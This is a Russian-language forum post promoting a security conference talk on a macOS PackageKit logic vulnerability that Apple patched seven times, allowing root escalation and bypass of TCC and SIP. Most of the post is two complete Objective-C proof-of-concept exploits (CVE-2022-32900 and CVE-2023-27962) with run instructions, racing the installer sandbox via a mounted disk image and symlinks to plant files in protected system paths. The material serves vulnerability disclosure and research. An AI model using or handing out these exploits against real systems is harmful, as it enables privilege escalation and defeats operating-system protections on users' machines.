Видео Сага об логической уязвимости в macOS, которую патчили 7 раз

[weaver]

Макаводам на заметку. Доклад про то как Apple все не как не может закрыть логическую уязвимость в PackageKit framework, которая позволяет повысить прова до root в macOS с обходом Transparency Consent and Control (TCC) и System Integrity Protection (SIP). Для этой уязвимости было выпущено 7 патчей: CVE-2022-26688, CVE-2022-32900, CVE-2023-23497, CVE-2023-27962, CVE-2023-38564, CVE-2023-42853, CVE-2024-23275.



[Objective by the Sea 2024] Endless Exploits: The Saga of a macOS Vulnerability Exploited Seven Times

Описание

How many patches must Apple release, before a vulnerability is truly fixed? The answer, my friend, is “blowin' in the wind” :P

In this talk, I will delve into an interesting logic vulnerability discovered in the PackageKit framework on macOS that allows for escalating privileges to root, circumventing the Transparency Consent and Control (TCC), and bypassing the System Integrity Protection (SIP). Many third-party applications are also affected by this vulnerability because of a wrong assumption in the mind of the developers! Even more interesting is the cat-and-mouse game between Apple's patching endeavors and my persistent bypass techniques.

It’s hard to believe that Apple released 7 patches in attempts to address the vulnerability before ultimately resolving it. Throughout this epic battle, I managed to harvest a series of CVEs: CVE-2022-26688, CVE-2022-32900, CVE-2023-23497, CVE-2023-27962, CVE-2023-38564, CVE-2023-42853 and CVE-2024-23275. I will discuss each of them in turn, detailing Apple's patches, as well as demonstrating how I've bypassed and exploited them multiple times.

Видео

Слайды
https://objectivebythesea.org/v7/talks/OBTS_v7_mJin.pdf

Спойлер: CVE-2022-32900

Run the exploit program with root, e.g., sudo ./exploit /tmp/sip_bypass /Library/Apple/sip_bypass
Install the Apple-signed pkg: sudo installer -pkg PagesEndNote.pkg -target /tmp/.exploit

exploit.m

#import <Foundation/Foundation.h>
#include <sys/stat.h>
#include <dirent.h>
#include <libgen.h>

#define MOUNT_DIR "/tmp/.exploit"

void prepare(const char *src, const char *dst) {
    if (strncmp(dst, "/Library", 8)) {
        printf("[!] dst path must be start with '/Library' (sorry for the hardcode).\n");
        exit(-1);
    }
   
    printf("[*] preparing the dmg mounting...\n");
    mkdir(MOUNT_DIR, 0777);
    system("hdiutil create -size 10m -volname .exploit -ov disk.dmg");
    system("hdiutil attach disk.dmg -mountpoint "MOUNT_DIR);
   
    printf("[*] preparing the payload...\n");
    char cmd[MAXPATHLEN] = {0};
    snprintf(cmd, MAXPATHLEN, "mkdir -p "MOUNT_DIR"/Root%s", dirname(strdup(dst)));
    system(cmd);
    snprintf(cmd, MAXPATHLEN, "cp %s "MOUNT_DIR"/Root%s", src, dst);
    system(cmd);
   
    symlink("/Library", MOUNT_DIR"/Library");
    printf("[*] all the preparations are done.\n");
}

void cleanup(void) {
    unlink("disk.dmg");
    system("rm -rf "MOUNT_DIR);
}

// the payload to be shoved from the path:
// $MOUNT_DIR/.PKInstallSandboxManager-SystemSoftware/2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox/Root

void fire_the_hole(void) {
    DIR *dp = NULL;
    struct dirent *ep = NULL;
    char *sandbox = NULL;
    char path[MAXPATHLEN] = {0};
   
    while (1) {
        dp = opendir(MOUNT_DIR"/.PKInstallSandboxManager-SystemSoftware");
        if (NULL == dp) continue;
        while ((ep = readdir (dp))) {
            if (strlen(ep->d_name) == 0x32) { //strlen("2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox")==0x32
                sandbox = ep->d_name;
                printf("[*] Got Sandbox:%s.\n", sandbox);
                goto NEXT1;
            }
        }
        closedir (dp);
    }
NEXT1:
    snprintf(path, MAXPATHLEN, MOUNT_DIR"/.PKInstallSandboxManager-SystemSoftware/%s/Root", sandbox);
    while (-1 == access(path, R_OK)) {
        //printf("[*] try to access: %s, errno:%d, waiting...\n", path, errno);
    }
   
    if (0 != rename(MOUNT_DIR"/Root", path)) {
        printf("[!] failed to move our payload to path:%s, errno=%d\n", path, errno);
        exit(-1);
    }
   
    printf("[*] exploit successfully :D\n");
}

int main(int argc, const char * argv[]) {
    if (argc != 3) {
        printf("Usage: %s /path/to/src /Library/*/dst\n", argv[0]);
    }
   
    prepare(argv[1], argv[2]);
   
    fire_the_hole();
   
    return 0;
}

Демо

Спойлер: CVE-2023-27962

Run the exploit program with root
Install the Apple-signed pkg: sudo installer -pkg PagesEndNote.pkg -target /tmp/.exploit

exploit.m

#import <Foundation/Foundation.h>
#include <sys/stat.h>
#include <dirent.h>
#include <libgen.h>

#define MOUNT_DIR "/tmp/.exploit"
#define SBX_REPO MOUNT_DIR"/.PKInstallSandboxManager-SystemSoftware"

#define FAKE_SBX "/tmp/fakebox"
#define FAKE_ROOT_PAYLOAD FAKE_SBX"/Root/Library/Apple/sip_bypass"

void prepare(void) {
    printf("[*] preparing the payload...\n");
    system("mkdir -p "FAKE_ROOT_PAYLOAD);
   
    printf("[*] preparing the dmg mounting...\n");
    system("mkdir -p "MOUNT_DIR);
    system("hdiutil create -size 10m -volname .exploit -ov /tmp/disk.dmg");
    system("hdiutil attach /tmp/disk.dmg -mountpoint "MOUNT_DIR);
   
    symlink("/Library", MOUNT_DIR"/Library");
   
    printf("[*] all the preparations are done.\n");
}

void cleanup(void) {
    unlink("/tmp/disk.dmg");
    system("rm -rf "MOUNT_DIR);
}

void spin_for_log(const char *hint) {
    static const char *log_path = "/var/log/install.log";
    FILE *fp = NULL;
    char line[4096] = {0};
   
    fp = fopen(log_path, "r");
    fseek(fp, 0, SEEK_END);
    long size = ftell(fp);
    fclose(fp);
   
    int found = 0;
    while (1) {
        fp = fopen(log_path, "r");
        fseek(fp, size, SEEK_SET);
        while (fgets(line, sizeof(line), fp) != NULL) {
            //printf("install.log: %s", line);
            if (strstr(line, hint)) {
                found = 1;
                break;
            }
        }
        size = ftell(fp);
        fclose(fp);
       
        if (found) {
            break;
        }
    }
}

// the payload to be shoved from the path:
// $MOUNT_DIR/.PKInstallSandboxManager-SystemSoftware/2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox/Root
void fire_the_hole(void) {
    DIR *dp = NULL;
    struct dirent *ep = NULL;
    char *sandbox = NULL;
    char path[MAXPATHLEN] = {0};
   
    while (1) {
        dp = opendir(SBX_REPO);
        if (NULL == dp) continue;
        while ((ep = readdir (dp))) {
            if (strlen(ep->d_name) == 0x32) { //strlen("2C3F8603-0D00-4AF2-9F4D-BE51119859F8.activeSandbox")==0x32
                sandbox = ep->d_name;
                printf("[*] Got Sandbox:%s.\n", sandbox);
                goto NEXT1;
            }
        }
        closedir (dp);
    }
NEXT1:
    snprintf(path, MAXPATHLEN, SBX_REPO"/%s", sandbox);
    spin_for_log("1 Install Scripts run.");
    [[NSFileManager defaultManager]removeItemAtPath:[NSString stringWithUTF8String:path] error:0];
    symlink(FAKE_SBX, path);
   
    printf("[*] exploit successfully :D\n");
}

int main(int argc, const char * argv[]) {
    prepare();
    fire_the_hole();
   
    return 0;
}

Демо

https://github.com/jhftss/POC